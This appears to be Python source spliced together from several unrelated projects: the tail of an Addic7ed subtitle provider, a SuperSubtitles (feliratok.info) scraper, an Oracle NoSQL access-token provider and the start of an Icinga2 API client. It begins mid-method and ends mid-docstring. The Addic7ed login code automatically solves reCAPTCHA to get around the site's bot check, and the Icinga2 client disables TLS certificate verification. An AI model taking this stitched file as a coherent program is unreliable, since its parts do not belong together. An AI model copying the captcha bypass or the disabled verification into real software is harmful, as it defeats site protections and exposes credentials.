                        cache_region.delete("addic7ed_data")
                    else:
                        logger.info('Addic7ed: Re-using old login')
                        self.logged_in = True
                        return True
                except (ConnectionError, ConnectTimeout) as e:
                    logger.debug(
                        "Addic7ed: There was a problem reaching the server: %s."
                        % e)
                    raise IPAddressBlocked(
                        "Addic7ed: Your IP is temporarily blocked.")

            if load_verification("addic7ed",
                                 self.session,
                                 callback=check_verification):
                return

            logger.info('Addic7ed: Logging in')
            data = {
                'username': self.username,
                'password': self.password,
                'Submit': 'Log in',
                'url': '',
                'remember': 'true'
            }

            # Up to 3 attempts; `tries` is bumped at the top of each pass and
            # checked before raising on captcha/login failures.
            tries = 0
            while tries <= 3:
                tries += 1
                r = self.session.get(self.server_url + 'login.php',
                                     timeout=10,
                                     headers={"Referer": self.server_url})
                if "g-recaptcha" in r.text or "grecaptcha" in r.text:
                    logger.info(
                        'Addic7ed: Solving captcha. This might take a couple of minutes, but should only '
                        'happen once every so often')

                    # Try both known captcha markups; `g` is the form field to
                    # fill, `s` the regex extracting the site key.
                    for g, s in (
                        ("g-recaptcha-response",
                         r'g-recaptcha.+?data-sitekey=\"(.+?)\"'),
                        ("recaptcha_response",
                         r'grecaptcha.execute\(\'(.+?)\',')):
                        site_key = re.search(s, r.text).group(1)
                        if site_key:
                            break

                    if not site_key:
                        logger.error("Addic7ed: Captcha site-key not found!")
                        return

                    pitcher = pitchers.get_pitcher()(
                        "Addic7ed",
                        self.server_url + 'login.php',
                        site_key,
                        user_agent=self.session.headers["User-Agent"],
                        cookies=self.session.cookies.get_dict(),
                        is_invisible=True)

                    result = pitcher.throw()
                    if not result:
                        if tries >= 3:
                            raise Exception(
                                "Addic7ed: Couldn't solve captcha!")
                        logger.info(
                            "Addic7ed: Couldn't solve captcha! Retrying")
                        continue

                    data[g] = result

                r = self.session.post(
                    self.server_url + 'dologin.php',
                    data,
                    allow_redirects=False,
                    timeout=10,
                    headers={"Referer": self.server_url + "login.php"})

                if "relax, slow down" in r.text:
                    raise TooManyRequests(self.username)

                if "Wrong password" in r.text or "doesn't exist" in r.text:
                    raise AuthenticationError(self.username)

                # success is a 302 redirect; anything else retries or fails
                if r.status_code != 302:
                    if tries >= 3:
                        logger.error(
                            "Addic7ed: Something went wrong when logging in")
                        raise AuthenticationError(self.username)
                    logger.info(
                        "Addic7ed: Something went wrong when logging in; retrying"
                    )
                    continue
                break

            store_verification("addic7ed", self.session)

            logger.debug('Addic7ed: Logged in')
            self.logged_in = True

    def terminate(self):
        """Close the HTTP session."""
        self.session.close()

    def get_show_id(self,
                    series,
                    year=None,
                    country_code=None,
                    ignore_cache=False):
        """Get the best matching show id for `series`, `year` and `country_code`.

        First search in the result of :meth:`_get_show_ids` and fallback on a search with
        :meth:`_search_show_id`.

        :param str series: series of the episode.
        :param year: year of the series, if any.
        :type year: int
        :param country_code: country code of the series, if any.
        :type country_code: str
        :return: the show id, if found.
        :rtype: int
        """
        show_id = None
        # try several sanitized spellings of the series name
        ids_to_look_for = {
            sanitize(series).lower(),
            sanitize(series.replace(".", "")).lower(),
            sanitize(series.replace("&", "and")).lower()
        }
        show_ids = self._get_show_ids()
        if ignore_cache or not show_ids:
            show_ids = self._get_show_ids.refresh(self)

        logger.debug("Trying show ids: %s", ids_to_look_for)
        for series_sanitized in ids_to_look_for:
            # attempt with country
            if not show_id and country_code:
                logger.debug('Getting show id with country')
                show_id = show_ids.get(
                    '%s %s' % (series_sanitized, country_code.lower()))

            # attempt with year
            if not show_id and year:
                logger.debug('Getting show id with year')
                show_id = show_ids.get('%s %d' % (series_sanitized, year))

            # attempt clean
            if not show_id:
                logger.debug('Getting show id')
                show_id = show_ids.get(series_sanitized)

        if not show_id:
            now = datetime.datetime.now()
            last_fetch = region.get(self.last_show_ids_fetch_key)

            # re-fetch show ids once per day if any show ID not found
            if not ignore_cache and last_fetch != NO_VALUE and last_fetch + datetime.timedelta(
                    days=1) < now:
                logger.info("Show id not found; re-fetching show ids")
                return self.get_show_id(series,
                                        year=year,
                                        country_code=country_code,
                                        ignore_cache=True)
            logger.debug(
                "Not refreshing show ids, as the last fetch has been too recent"
            )

        # search as last resort
        # broken right now
        # if not show_id:
        #     logger.warning('Series %s not found in show ids', series)
        #     show_id = self._search_show_id(series)

        return show_id

    @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME)
    def _get_show_ids(self):
        """Get the ``dict`` of show ids per series by querying the `shows.php` page.

        :return: show id per series, lower case and without quotes.
        :rtype: dict

        # patch: add punctuation cleaning
        """
        # get the show page
        logger.info('Getting show ids')
        # record fetch time so get_show_id can throttle daily re-fetches
        region.set(self.last_show_ids_fetch_key, datetime.datetime.now())

        r = self.session.get(self.server_url + 'shows.php', timeout=10)
        r.raise_for_status()

        # LXML parser seems to fail when parsing Addic7ed.com HTML markup.
        # Last known version to work properly is 3.6.4 (next version, 3.7.0, fails)
        # Assuming the site's markup is bad, and stripping it down to only contain what's needed.
        show_cells = re.findall(show_cells_re, r.content)
        if show_cells:
            soup = ParserBeautifulSoup(
                b''.join(show_cells).decode('utf-8', 'ignore'),
                ['lxml', 'html.parser'])
        else:
            # If RegEx fails, fall back to original r.text and use 'html.parser'
            soup = ParserBeautifulSoup(r.text, ['html.parser'])

        # populate the show ids
        show_ids = {}
        shows = soup.select('td > h3 > a[href^="/show/"]')
        for show in shows:
            show_clean = sanitize(show.text,
                                  default_characters=self.sanitize_characters)
            try:
                show_id = int(show['href'][6:])
            except ValueError:
                continue

            show_ids[show_clean] = show_id
            match = series_year_re.match(show_clean)
            if match and match.group(2) and match.group(1) not in show_ids:
                # year found, also add it without year
                show_ids[match.group(1)] = show_id

        soup.decompose()
        soup = None

        logger.debug('Found %d show ids', len(show_ids))

        if not show_ids:
            raise Exception("Addic7ed: No show IDs found!")

        return show_ids

    @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME)
    def _search_show_id(self, series, year=None):
        """Search the show id from the `series` and `year`.

        :param str series: series of the episode.
        :param year: year of the series, if any.
        :type year: int
        :return: the show id, if found.
        :rtype: int
        """
        # addic7ed doesn't support search with quotes
        series = series.replace('\'', ' ')

        # build the params
        series_year = '%s %d' % (series, year) if year is not None else series
        params = {'search': series_year, 'Submit': 'Search'}

        # make the search
        logger.info('Searching show ids with %r', params)

        # currently addic7ed searches via srch.php from the front page, then a re-search is needed which calls
        # search.php
        for endpoint in (
                "srch.php",
                "search.php",
        ):
            headers = None
            if endpoint == "search.php":
                headers = {"referer": self.server_url + "srch.php"}

            r = self.session.get(self.server_url + endpoint,
                                 params=params,
                                 timeout=10,
                                 headers=headers)
            r.raise_for_status()

            if r.text and "Sorry, your search" not in r.text:
                break

            time.sleep(4)

        if r.status_code == 304:
            raise TooManyRequests()

        soup = ParserBeautifulSoup(r.text, ['lxml', 'html.parser'])

        suggestion = None

        # get the suggestion
        try:
            suggestion = soup.select('span.titulo > a[href^="/show/"]')
            if not suggestion:
                logger.warning('Show id not found: no suggestion')
                return None

            if not sanitize(suggestion[0].i.text.replace('\'', ' '),
                            default_characters=self.sanitize_characters) == \
                    sanitize(series_year, default_characters=self.sanitize_characters):
                logger.warning('Show id not found: suggestion does not match')
                return None

            show_id = int(suggestion[0]['href'][6:])
            logger.debug('Found show id %d', show_id)

            return show_id
        finally:
            soup.decompose()
            soup = None

    def query(self, show_id, series, season, year=None, country=None):
        # patch: fix logging

        # get the page of the season of the show
        logger.info('Getting the page of show id %d, season %d', show_id,
                    season)
        r = self.session.get(self.server_url + 'ajax_loadShow.php',
                             params={
                                 'show': show_id,
                                 'season': season
                             },
                             timeout=10,
                             headers={
                                 "referer":
                                 "%sshow/%s" % (self.server_url, show_id),
                                 "X-Requested-With": "XMLHttpRequest"
                             })

        r.raise_for_status()

        if r.status_code == 304:
            raise TooManyRequests()

        if not r.text:
            # Provider wrongful return a status of 304 Not Modified with an empty content
            # raise_for_status won't raise exception for that status code
            logger.error('No data returned from provider')
            return []

        soup = ParserBeautifulSoup(r.text, ['lxml', 'html.parser'])

        # loop over subtitle rows
        subtitles = []
        for row in soup.select('tr.epeven'):
            cells = row('td')

            # ignore incomplete subtitles (a percentage in the status column
            # means the subtitle is still in progress)
            status = cells[5].text
            if "%" in status:
                logger.debug('Ignoring subtitle with status %s', status)
                continue

            # read the item
            language = Language.fromaddic7ed(cells[3].text)
            hearing_impaired = bool(cells[6].text)
            page_link = self.server_url + cells[2].a['href'][1:]
            season = int(cells[0].text)
            episode = int(cells[1].text)
            title = cells[2].text
            version = cells[4].text
            download_link = cells[9].a['href'][1:]

            subtitle = self.subtitle_class(language, hearing_impaired,
                                           page_link, series, season, episode,
                                           title, year, version, download_link)
            logger.debug('Found subtitle %r', subtitle)
            subtitles.append(subtitle)

        soup.decompose()
        soup = None

        return subtitles

    def download_subtitle(self, subtitle):
        # download the subtitle
        r = self.session.get(self.server_url + subtitle.download_link,
                             headers={'Referer': subtitle.page_link},
                             timeout=10)
        r.raise_for_status()

        if r.status_code == 304:
            raise TooManyRequests()

        if not r.text:
            # Provider wrongful return a status of 304 Not Modified with an empty content
            # raise_for_status won't raise exception for that status code
            logger.error(
                'Unable to download subtitle. No data returned from provider')
            return

        # detect download limit exceeded
        if r.headers['Content-Type'] == 'text/html':
            raise DownloadLimitExceeded

        subtitle.content = fix_line_ending(r.content)
class SuperSubtitlesProvider(Provider, ProviderSubtitleArchiveMixin):
    """SuperSubtitles Provider.

    Scrapes https://www.feliratok.info/ for Hungarian/English subtitles of
    episodes and movies.
    """
    # NOTE(review): 'hun' appears both explicitly and in the comprehension;
    # the set union makes that harmless but it looks unintentional.
    languages = {Language('hun', 'HU')} | {Language(l) for l in ['hun', 'eng']}
    video_types = (Episode, Movie)
    # https://www.feliratok.info/?search=&soriSorszam=&nyelv=&sorozatnev=The+Flash+%282014%29&sid=3212&complexsearch=true&knyelv=0&evad=4&epizod1=1&cimke=0&minoseg=0&rlsr=0&tab=all
    server_url = 'https://www.feliratok.info/'
    subtitle_class = SuperSubtitlesSubtitle
    hearing_impaired_verifiable = False
    multi_result_throttle = 2  # seconds between successive title queries

    def initialize(self):
        # Create the HTTP session used by all queries; User-Agent may be
        # overridden through the SZ_USER_AGENT environment variable.
        self.session = Session()
        self.session.headers = {
            'User-Agent': os.environ.get("SZ_USER_AGENT", "Sub-Zero/2")
        }

    def terminate(self):
        # Release the HTTP session created in initialize().
        self.session.close()

    def get_language(self, text):
        """Map the site's Hungarian language labels to Language objects.

        Returns None for any label other than 'Magyar' / 'Angol'.
        """
        if text == 'Magyar':
            return Language.fromsupersubtitles('hu')
        if text == 'Angol':
            return Language.fromsupersubtitles('en')
        return None

    def find_imdb_id(self, sub_id):
        """Scrape the IMDB id from a subtitle's detail page, or None."""
        url = self.server_url + "index.php?tipus=adatlap&azon=a_" + sub_id
        # url = https://www.feliratok.info/index.php?tipus=adatlap&azon=a_1518600916
        logger.info('Get IMDB id from URL %s', url)
        r = self.session.get(url, timeout=10).content

        soup = ParserBeautifulSoup(r, ['lxml'])
        links = soup.find_all("a")

        for value in links:
            if "imdb.com" in str(value):
                # <a alt="iMDB" href="http://www.imdb.com/title/tt2357547/" target="_blank"><img alt="iMDB" src="img/adatlap/imdb.png"/></a>
                imdb_id = re.findall(r'(?<=www\.imdb\.com/title/).*(?=/")', str(value))[0]
                return imdb_id

        return None

    def find_id(self, series, year, original_title):
        """
        We need to find the id of the series at the following url:
        https://www.feliratok.info/index.php?term=SERIESNAME&nyelv=0&action=autoname
        Where SERIESNAME is a searchable string.
        The result will be something like this:
        [{"name":"DC\u2019s Legends of Tomorrow (2016)","ID":"3725"},{"name":"Miles from Tomorrowland (2015)","ID":"3789"}
        ,{"name":"No Tomorrow (2016)","ID":"4179"}]

        Returns the site-internal series ID, or None when no candidate
        matches *original_title* (and *year*, when available).
        """
        # Search for exact name
        url = self.server_url + "index.php?term=" + series + "&nyelv=0&action=autoname"
        # url = self.server_url + "index.php?term=" + "fla"+ "&nyelv=0&action=autoname"
        logger.info('Get series id from URL %s', url)
        r = self.session.get(url, timeout=10)

        # r is something like this:
        # [{"name":"DC\u2019s Legends of Tomorrow (2016)","ID":"3725"},{"name":"Miles from Tomorrowland (2015)","ID":"3789"}
        # ,{"name":"No Tomorrow (2016)","ID":"4179"}]
        results = r.json()

        # check all of the results:
        for result in results:
            try:
                # "name":"Miles from Tomorrowland (2015)","ID":"3789"
                result_year = re.findall(r"(?<=\()\d\d\d\d(?=\))", result['name'])[0]
            except IndexError:
                result_year = ""

            try:
                # "name":"Miles from Tomorrowland (2015)","ID":"3789"
                result_title = re.findall(r".*(?=\(\d\d\d\d\))", result['name'])[0]
                result_id = result['ID']
            except IndexError:
                continue

            # Normalize the title; the "�" literal strips mojibake characters
            # coming back from the site (bytes preserved intentionally).
            result_title = result_title.strip().replace("�", "").replace(" ", ".")

            # Build a fake release name so guessit can split title/year.
            guessable = result_title.strip() + ".s01e01." + result_year
            guess = guessit(guessable, {'type': "episode"})

            if sanitize(original_title) == sanitize(guess['title']) and year and guess['year'] and \
                    year == guess['year']:
                # Return the founded id
                return result_id

        return None

    def query(self, series, video=None):
        """Search the site for *video* and return matching subtitles.

        For an Episode, resolves the series id first (with progressively
        looser name variants) and falls back to season-pack search; for a
        Movie, performs a plain title search.
        """
        year = video.year
        subtitle = None
        if isinstance(video, Episode):
            series = video.series
            season = video.season
            episode = video.episode
            #seriesa = series.replace(' ', '+')

            # Get ID of series with original name
            series_id = self.find_id(series, year, series)
            if not series_id:
                # If not founded try without ' char
                modified_series = series.replace(' ', '+').replace('\'', '')
                series_id = self.find_id(modified_series, year, series)
                if not series_id and modified_series:
                    # If still not founded try with the longest word is series title
                    modified_series = modified_series.split('+')
                    modified_series = max(modified_series, key=len)
                    series_id = self.find_id(modified_series, year, series)

                    if not series_id:
                        return None

            # https://www.feliratok.info/index.php?search=&soriSorszam=&nyelv=&sorozatnev=&sid=2075&complexsearch=true&knyelv=0&evad=6&epizod1=16&cimke=0&minoseg=0&rlsr=0&tab=all
            url = self.server_url + "index.php?search=&soriSorszam=&nyelv=&sorozatnev=&sid=" + \
                str(series_id) + "&complexsearch=true&knyelv=0&evad=" + str(season) + "&epizod1=" + str(
                episode) + "&cimke=0&minoseg=0&rlsr=0&tab=all"
            subtitle = self.process_subs(series, video, url)

            if not subtitle:
                # No Subtitle found. Maybe already archived to season pack
                url = self.server_url + "index.php?search=&soriSorszam=&nyelv=&sorozatnev=&sid=" + \
                    str(series_id) + "&complexsearch=true&knyelv=0&evad=" + str(
                    season) + "&epizod1=&evadpakk=on&cimke=0&minoseg=0&rlsr=0&tab=all"
                subtitle = self.process_subs(series, video, url)

        if isinstance(video, Movie):
            title = series.replace(" ", "+")
            # https://www.feliratok.info/index.php?search=The+Hitman%27s+BodyGuard&soriSorszam=&nyelv=&tab=film
            url = self.server_url + "index.php?search=" + title + "&soriSorszam=&nyelv=&tab=film"
            subtitle = self.process_subs(series, video, url)

        return subtitle

    def process_subs(self, series, video, url):
        """Parse a search-result page at *url* into subtitle objects.

        Every row marked "vilagit" (after the two header rows, hence the
        ``i > 1`` guard) is scraped with lookahead/lookbehind regexes over
        the raw HTML.  Returns a list of SuperSubtitlesSubtitle.
        """
        subtitles = []

        logger.info('URL for subtitles %s', url)
        r = self.session.get(url, timeout=10).content

        soup = ParserBeautifulSoup(r, ['lxml'])
        tables = soup.find_all("table")
        tables = tables[0].find_all("tr")

        i = 0
        series_imdb_id = None
        for table in tables:
            if "vilagit" in str(table) and i > 1:
                try:
                    sub_hun_name = table.findAll("div", {"class": "magyar"})[0]
                    if isinstance(video, Episode):
                        # NOTE(review): the two example comments below look
                        # swapped relative to their branches — verify against
                        # live site markup.
                        if "vad)" not in str(sub_hun_name):
                            # <div class="magyar">A pletykaf�szek (3. �vad)</div>
                            sub_hun_name = re.findall(
                                r'(?<=<div class="magyar">).*(?= -)', str(sub_hun_name))[0]
                        else:
                            # <div class="magyar">A holnap legend�i - 3x11</div>
                            sub_hun_name = re.findall(
                                r'(?<=<div class="magyar">).*(?= \()', str(sub_hun_name))[0]
                    if isinstance(video, Movie):
                        sub_hun_name = re.findall(
                            r'(?<=<div class="magyar">).*(?=</div)', str(sub_hun_name))[0]
                except IndexError:
                    sub_hun_name = ""

                asked_for_episode = None
                sub_season = None
                sub_episode = None
                sub_english = table.findAll("div", {"class": "eredeti"})
                if isinstance(video, Episode):
                    asked_for_episode = video.episode
                    if "Season" not in str(sub_english):
                        # [<div class="eredeti">Gossip Girl (Season 3) (DVDRip-REWARD)</div>]
                        sub_english_name = re.findall(
                            r'(?<=<div class="eredeti">).*?(?= -)', str(sub_english))[0]
                        sub_season = int((re.findall(
                            r"(?<=- ).*?(?= - )", str(sub_english))[0].split('x')[0]).strip())
                        sub_episode = int((re.findall(
                            r"(?<=- ).*?(?= - )", str(sub_english))[0].split('x')[1]).strip())
                    else:
                        # [<div class="eredeti">DC's Legends of Tomorrow - 3x11 - Here I Go Again (HDTV-AFG, HDTV-RMX, 720p-SVA, 720p-PSA </div>]
                        sub_english_name = \
                            re.findall(r'(?<=<div class="eredeti">).*?(?=\(Season)', str(sub_english))[0]
                        sub_season = int(
                            re.findall(r"(?<=Season )\d+(?=\))", str(sub_english))[0])
                        sub_episode = int(video.episode)
                if isinstance(video, Movie):
                    sub_english_name = re.findall(
                        r'(?<=<div class="eredeti">).*?(?=\()', str(sub_english))[0]

                # Version/release info is the last parenthesized group.
                sub_version = (str(sub_english).split('(')[
                    len(str(sub_english).split('(')) - 1]).split(')')[0]

                # <small>Angol</small>
                lang = table.findAll("small")[0]
                sub_language = self.get_language(
                    re.findall(r"(?<=<small>).*(?=</small>)", str(lang))[0])

                # <a href="/index.php?action=letolt&fnev=DCs Legends of Tomorrow - 03x11 - Here I Go Again.SVA.English.C.orig.Addic7ed.com.srt&felirat=1519162191">
                link = str(table.findAll("a")[len(table.findAll("a")) - 1]).replace("amp;", "")
                sub_downloadlink = self.server_url + re.findall(
                    r'(?<=href="/).*(?=">)', link)[0]
                sub_id = re.findall(r"(?<=felirat\=).*(?=\"\>)", link)[0]
                sub_year = video.year
                sub_releases = [s.strip() for s in sub_version.split(',')]

                # For episodes we open the series page so all subtitles imdb_id must be the same. no need to check all
                if isinstance(video, Episode) and series_imdb_id is not None:
                    sub_imdb_id = series_imdb_id
                else:
                    sub_imdb_id = self.find_imdb_id(sub_id)
                    series_imdb_id = sub_imdb_id

                subtitle = SuperSubtitlesSubtitle(
                    sub_language, sub_downloadlink, sub_id, sub_english_name.strip(),
                    sub_season, sub_episode, sub_version, sub_releases, sub_year,
                    sub_imdb_id, asked_for_episode,
                    asked_for_release_group=video.release_group)
                subtitles.append(subtitle)
            i = i + 1
        return subtitles

    def list_subtitles(self, video, languages):
        """Query each candidate title until one yields results.

        Throttles between queries via multi_result_throttle.
        """
        if isinstance(video, Episode):
            titles = [video.series] + video.alternative_series
        elif isinstance(video, Movie):
            titles = [video.title] + video.alternative_titles

        for title in titles:
            subs = self.query(title, video=video)
            if subs:
                return subs

            time.sleep(self.multi_result_throttle)

        return []

    def download_subtitle(self, subtitle):
        """Fetch subtitle content; unpacks rar/zip archives when needed."""
        # download as a zip
        logger.info('Downloading subtitle %r', subtitle.subtitle_id)
        r = self.session.get(subtitle.page_link, timeout=10)
        r.raise_for_status()

        if ".rar" in subtitle.page_link:
            logger.debug('Archive identified as rar')
            archive_stream = io.BytesIO(r.content)
            archive = RarFile(archive_stream)
            subtitle.content = self.get_subtitle_from_archive(subtitle, archive)
        elif ".zip" in subtitle.page_link:
            logger.debug('Archive identified as zip')
            archive_stream = io.BytesIO(r.content)
            archive = ZipFile(archive_stream)
            subtitle.content = self.get_subtitle_from_archive(subtitle, archive)
        else:
            subtitle.content = fix_line_ending(r.content)
class StoreAccessTokenProvider(AuthorizationProvider):
    """
    On-premise only.

    StoreAccessTokenProvider is an
    :py:class:`borneo.AuthorizationProvider` that performs the following
    functions:

        Initial (bootstrap) login to store, using credentials provided.\n
        Storage of bootstrap login token for re-use.\n
        Optionally renews the login token before it expires.\n
        Logs out of the store when closed.

    If accessing an insecure instance of Oracle NoSQL Database the default
    constructor is used, with no arguments.

    If accessing a secure instance of Oracle NoSQL Database a user name and
    password must be provided. That user must already exist in the NoSQL
    Database and have sufficient permission to perform table operations. That
    user's identity is used to authorize all database operations.

    To access to a store without security enabled, no parameter need to be set
    to the constructor.

    To access to a secure store, the constructor requires a valid user name and
    password to access the target store. The user must exist and have sufficient
    permission to perform table operations required by the application. The user
    identity is used to authorize all operations performed by the application.

    :param user_name: the user name to use for the store. This user must exist
        in the NoSQL Database and is the identity that is used for authorizing
        all database operations.
    :type user_name: str
    :param password: the password for the user.
    :type password: str
    :raises IllegalArgumentException: raises the exception if one or more of the
        parameters is malformed or a required parameter is missing.
    """
    # Used when we send user:password pair.
    _BASIC_PREFIX = 'Basic '
    # The general prefix for the login token.
    _BEARER_PREFIX = 'Bearer '
    # Login service end point name.
    _LOGIN_SERVICE = '/login'
    # Login token renew service end point name.
    _RENEW_SERVICE = '/renew'
    # Logout service end point name.
    _LOGOUT_SERVICE = '/logout'
    # Default timeout when sending http request to server
    _HTTP_TIMEOUT_MS = 30000

    def __init__(self, user_name=None, password=None):
        self._endpoint = None
        self._url = None
        # Cached 'Bearer <token>' string; None until bootstrap_login runs.
        self._auth_string = None
        self._auto_renew = True
        self._is_closed = False
        # The base path for security related services.
        self._base_path = HttpConstants.KV_SECURITY_PATH
        # The login token expiration time.
        self._expiration_time = 0
        self._logger = None
        self._logutils = LogUtils(self._logger)
        self._sess = Session()
        self._request_utils = borneo.http.RequestUtils(self._sess,
                                                       self._logutils)
        self._lock = Lock()
        self._timer = None
        # NOTE(review): self.lock duplicates self._lock and is never used
        # elsewhere in this class — candidate for removal.
        self.lock = Lock()
        if user_name is None and password is None:
            # Used to access to a store without security enabled.
            self._is_secure = False
        else:
            if user_name is None or password is None:
                raise IllegalArgumentException('Invalid input arguments.')
            CheckValue.check_str(user_name, 'user_name')
            CheckValue.check_str(password, 'password')
            self._is_secure = True
            self._user_name = user_name
            self._password = password

    @synchronized
    def bootstrap_login(self):
        # Bootstrap login using the provided credentials.
        if not self._is_secure or self._is_closed:
            return
        # Convert the username:password pair in base 64 format.
        pair = self._user_name + ':' + self._password
        try:
            # Python 2: b64encode accepts str directly.
            encoded_pair = b64encode(pair)
        except TypeError:
            # Python 3: encode to bytes first, then decode the result.
            encoded_pair = b64encode(pair.encode()).decode()
        try:
            # Send request to server for login token.
            response = self._send_request(
                StoreAccessTokenProvider._BASIC_PREFIX + encoded_pair,
                StoreAccessTokenProvider._LOGIN_SERVICE)
            content = response.get_content()
            # Login fail
            if response.get_status_code() != codes.ok:
                raise InvalidAuthorizationException(
                    'Fail to login to service: ' + content)
            if self._is_closed:
                return
            # Generate the authentication string using login token.
            self._auth_string = (StoreAccessTokenProvider._BEARER_PREFIX +
                                 self._parse_json_result(content))
            # Schedule login token renew thread.
            self._schedule_refresh()
        except (ConnectionError, InvalidAuthorizationException) as e:
            self._logutils.log_debug(format_exc())
            raise e
        except Exception as e:
            self._logutils.log_debug(format_exc())
            raise NoSQLException('Bootstrap login fail.', e)

    @synchronized
    def close(self):
        """
        Close the provider, releasing resources such as a stored login token.
        """
        # Don't do anything for non-secure case.
        if not self._is_secure or self._is_closed:
            return
        # Send request for logout.
        try:
            response = self._send_request(
                self._auth_string, StoreAccessTokenProvider._LOGOUT_SERVICE)
            if response.get_status_code() != codes.ok:
                self._logutils.log_info(
                    'Failed to logout user ' + self._user_name + ': ' +
                    response.get_content())
        except Exception as e:
            # Best-effort logout: failure is logged, not raised.
            self._logutils.log_info(
                'Failed to logout user ' + self._user_name + ': ' + str(e))
        # Clean up.
        self._is_closed = True
        self._auth_string = None
        self._expiration_time = 0
        self._password = None
        if self._timer is not None:
            self._timer.cancel()
            self._timer = None
        if self._sess is not None:
            self._sess.close()

    def get_authorization_string(self, request=None):
        """Return the cached auth string, logging in lazily if needed.

        Returns None for a non-secure store or after close().
        """
        if (request is not None and
                not isinstance(request, borneo.operations.Request)):
            raise IllegalArgumentException(
                'get_authorization_string requires an instance of Request or ' +
                'None as parameter.')
        if not self._is_secure or self._is_closed:
            return None
        # If there is no cached auth string, re-authentication to retrieve the
        # login token and generate the auth string.
        if self._auth_string is None:
            self.bootstrap_login()
        return self._auth_string

    def is_secure(self):
        """
        Returns whether the provider is accessing a secured store.

        :returns: True if accessing a secure store, otherwise False.
        :rtype: bool
        """
        return self._is_secure

    def set_auto_renew(self, auto_renew):
        """
        Sets the auto-renew state. If True, automatic renewal of the login
        token is enabled.

        :param auto_renew: set to True to enable auto-renew.
        :type auto_renew: bool
        :returns: self.
        :raises IllegalArgumentException: raises the exception if auto_renew is
            not True or False.
        """
        CheckValue.check_boolean(auto_renew, 'auto_renew')
        self._auto_renew = auto_renew
        return self

    def is_auto_renew(self):
        """
        Returns whether the login token is to be automatically renewed.

        :returns: True if auto-renew is set, otherwise False.
        :rtype: bool
        """
        return self._auto_renew

    def set_endpoint(self, endpoint):
        """
        Sets the endpoint of the on-prem proxy.

        :param endpoint: the endpoint.
        :type endpoint: str
        :returns: self.
        :raises IllegalArgumentException: raises the exception if endpoint is
            not a string.
        """
        CheckValue.check_str(endpoint, 'endpoint')
        self._endpoint = endpoint
        self._url = borneo.config.NoSQLHandleConfig.create_url(endpoint, '')
        if self._is_secure and self._url.scheme.lower() != 'https':
            raise IllegalArgumentException(
                'StoreAccessTokenProvider requires use of https.')
        return self

    def get_endpoint(self):
        """
        Returns the endpoint of the on-prem proxy.

        :returns: the endpoint.
        :rtype: str
        """
        return self._endpoint

    def set_logger(self, logger):
        # Replace the logger and rebuild the logging helper around it.
        CheckValue.check_logger(logger, 'logger')
        self._logger = logger
        self._logutils = LogUtils(logger)
        return self

    def get_logger(self):
        return self._logger

    def set_ssl_context(self, ssl_ctx):
        # Internal use only
        adapter = SSLAdapter(ssl_ctx)
        self._sess.mount(self._url.scheme + '://', adapter)

    def set_url_for_test(self):
        # Internal use only: downgrade https to http for test servers.
        self._url = urlparse(self._url.geturl().replace('https', 'http'))
        return self

    def validate_auth_string(self, auth_string):
        # Secure stores require a non-None authorization string.
        if self._is_secure and auth_string is None:
            raise IllegalArgumentException(
                'Secured StoreAccessProvider requires a non-none string.')

    def _parse_json_result(self, json_result):
        # Retrieve login token from JSON string.
        result = loads(json_result)
        # Extract expiration time from JSON result.
        # Side effect: updates self._expiration_time.
        self._expiration_time = result['expireAt']
        # Extract login token from JSON result.
        return result['token']

    def _refresh_task(self):
        """
        This task sends a request to the server for login session extension.
        Depending on the server policy, a new login token with new expiration
        time may or may not be granted.
        """
        if not self._is_secure or not self._auto_renew or self._is_closed:
            return
        try:
            old_auth = self._auth_string
            response = self._send_request(
                old_auth, StoreAccessTokenProvider._RENEW_SERVICE)
            # NOTE(review): the response body is parsed (and
            # _expiration_time updated) before the status code is checked;
            # a non-OK, non-JSON body would raise here instead of producing
            # InvalidAuthorizationException — confirm intended.
            token = self._parse_json_result(response.get_content())
            if response.get_status_code() != codes.ok:
                raise InvalidAuthorizationException(token)
            if self._is_closed:
                return
            # Only install the new token if no one swapped it meanwhile.
            with self._lock:
                if self._auth_string == old_auth:
                    self._auth_string = (
                        StoreAccessTokenProvider._BEARER_PREFIX + token)
            self._schedule_refresh()
        except Exception as e:
            # Renewal is best-effort; log and stop the timer on failure.
            self._logutils.log_info(
                'Failed to renew login token: ' + str(e))
            if self._timer is not None:
                self._timer.cancel()
                self._timer = None

    def _schedule_refresh(self):
        # Schedule a login token renew when half of the token life time is
        # reached.
        if not self._is_secure or not self._auto_renew:
            return
        # Clean up any existing timer
        if self._timer is not None:
            self._timer.cancel()
            self._timer = None
        acquire_time = int(round(time() * 1000))
        if self._expiration_time <= 0:
            return
        # If it is 10 seconds before expiration, don't do further renew to
        # avoid to many renew request in the last few seconds.
        if self._expiration_time > acquire_time + 10000:
            renew_time = (
                acquire_time + (self._expiration_time - acquire_time) // 2)
            self._timer = Timer(
                float(renew_time - acquire_time) / 1000, self._refresh_task)
            self._timer.start()

    def _send_request(self, auth_header, service_name):
        # Send HTTPS request to login/renew/logout service location with proper
        # authentication information.
        headers = {'Host': self._url.hostname, 'Authorization': auth_header}
        return self._request_utils.do_get_request(
            self._url.geturl() + self._base_path + service_name, headers,
            StoreAccessTokenProvider._HTTP_TIMEOUT_MS)
class Icinga2Api(object):
    """
    Main Class to implement the Icinga2 API Client.

    Reads all parameters from the Ansible ``module`` global and schedules
    downtimes through the Icinga2 REST API (/v1).
    """
    module = None

    def __init__(self):
        """
        Initialize all needed Variables from the Ansible module parameters
        and build an authenticated, JSON-speaking requests session.
        """
        self.icinga_host = module.params.get("host")
        self.icinga_port = module.params.get("port")
        self.icinga_username = module.params.get("username")
        self.icinga_password = module.params.get("password")
        self.state = module.params.get("state")
        self.hostname = module.params.get("hostname")
        self.hostnames = module.params.get("hostnames")
        self.start_time = module.params.get("start_time")
        self.end_time = module.params.get("end_time")
        self.duration = module.params.get("duration")
        self.object_type = module.params.get("object_type")
        self.all_services = module.params.get("all_services")
        self.author = module.params.get("author")
        self.comment = module.params.get("comment")
        self.fixed = module.params.get("fixed")
        self.filter_vars = None
        self.trigger_name = None

        self.icinga_url = "{0}:{1}/v1".format(self.icinga_host, self.icinga_port)

        self.connection = Session()
        self.connection.headers.update({'Accept': 'application/json'})
        self.connection.auth = (self.icinga_username, self.icinga_password)

        # TLS verification is disabled (verify=False below); silence the
        # resulting urllib3 warnings.
        urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

    def run(self):
        """Schedule a downtime for every known host in ``hostnames``.

        :returns: Ansible-style result dict with ``changed`` and, when
